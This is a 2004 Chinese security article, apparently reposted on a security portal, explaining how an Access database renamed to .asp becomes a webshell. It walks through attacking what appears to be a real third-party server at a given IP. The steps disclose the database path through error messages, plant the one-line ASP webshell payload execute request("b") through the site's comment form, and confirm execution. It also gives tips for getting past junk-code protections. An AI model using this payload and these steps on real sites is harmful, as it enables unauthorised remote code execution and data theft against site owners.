首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>网络安全>文章内容
改mdb为asp所带来的灾难
来源:vfocus.net 作者:SuperHei 发布时间:2004-09-11  

改mdb为asp所带来的灾难
文/SuperHei·Lilo 2004-8-2


可能是随着网络安全技术的发展吧,管理员的素质都在提高,在使用access+asp系统时,为不数据库被人下载,到把mdb改为asp或asa。先不说直接改后缀,直接可以用网快等工具直接下载,其实这样你已经是为入侵者打开了大门。入侵者可以利用asp/asa为后缀的数据库直接得到webshell。

一.思路

  大家都知道<%%>为asp文件的标志符,也就是说一个asp文件只会去执行之间的代码,access+asp的web系统的所有数据都是存放在数据库文件里(mdb文件),由于管理者把mdb文件改为了asp文件,如果我们提交的数据里包含有,那当我们访问这个asp数据库的时候就会去执行之间的代码。这样导致我们只提交恶意代码给数据库,那么asp后缀的数据库就是我们的webshell了。

二.示例

  随便找个目标,首先我们暴库,看是不是asp后缀的数据库:
http://220.170.151.103/test/dlog%5cshowlog.asp?cat_id=5&log_id=210


返回:

Microsoft VBScript 编译器错误 错误 '800a03f6'
缺少 'End'

/iisHelp/common/500-100.asp,行242

Microsoft JET Database Engine 错误 '80004005'

'D:\log_mdb\%29dlog_mdb%29.asp'不是一个有效的路径。 确定路径名称拼写是否正确,以及是否连接到文件存放的服务器。

/test/conn.asp,行18


  我们提交:http://220.170.151.103/test/dlog/log_mdb/%2529dlog_mdb%2529.asp返回一堆的乱码,这样我们可以直接用网际快车等工具直接下载数据库(这里我们不讨论)。我们回到主页看到有提供“网友评论”功能。我们注册个用户,发一条评论:

< %execute request("b")%>

  这样我们就把asp代码:写入了数据库,那么数据库:就是我们的webshell咯。提交:http://220.170.151.103/test/dlog/log_mdb/%2529dlog_mdb%2529.asp在乱码的最后我们看到:

/iisHelp/common/500-100.asp,行242
Microsoft VBScript 运行时错误 错误 '800a000d'

类型不匹配: 'execute'

/test/dlog/log_mdb/%29dlog_mdb%29.asp,行1266


  哈哈,我们的插入的代码运行了。如下图:


注意:我们在向数据库提交代码时,代码内容不可以太大。所以我们采用。

三.其他一些问题和思路


  1.对于改了后缀为asp,还对数据库里加入了等非法的asp代码来彻底防止下载的数据库,由于里面存在了非法的asp代码,插入我们的webshell代码后运行,将只会显示前面非法代码的错误,而不去执行我们shell的代码。虽然这样可以防止一定的攻击,但还是存在一定的隐患,我们只要在出错的代码前加入兼容错误的代码,就可以得到正确显示执行我们插入的webshell代码了。

  2.对于没有改后缀的,也就是mdb文件,这样我们可以先直接下载下来得到后台密码,进了后台,可以利用数据库备用改后缀为asp。


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·一句话木马
·samcrypt.lib简介
·教你轻松查看QQ空间加密后的好友
·web sniffer 在线嗅探/online ht
·SPIKE与Peach Fuzzer相关知识
·asp,php,aspx一句话集合
·Cisco PIX525 配置备忘
·用Iptables+Fedora做ADSL 路由器
·检查 Web 应用安全的几款开源免
·Md5(base64)加密与解密实战
·NT下动态切换进程分析笔记
·风险评估中的渗透测试
  相关文章
·使用Honeypots 同Internet 蠕虫
·用MRTG在IIS 6.0上实现入侵检测
·无线入侵检测系统
·企业客户端补丁管理框架
·浅谈MYSQL跨库查询
·打造Linux下超级安全的LAMP服务
·Loadable Kernel Modules 注射
·凯撒密文的破解编程实现
·小议脚本变形
·UNIX入侵检测方法
·补丁管理最佳安全实践之资产评估
·CLR 中代码访问安全检测实现原理
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved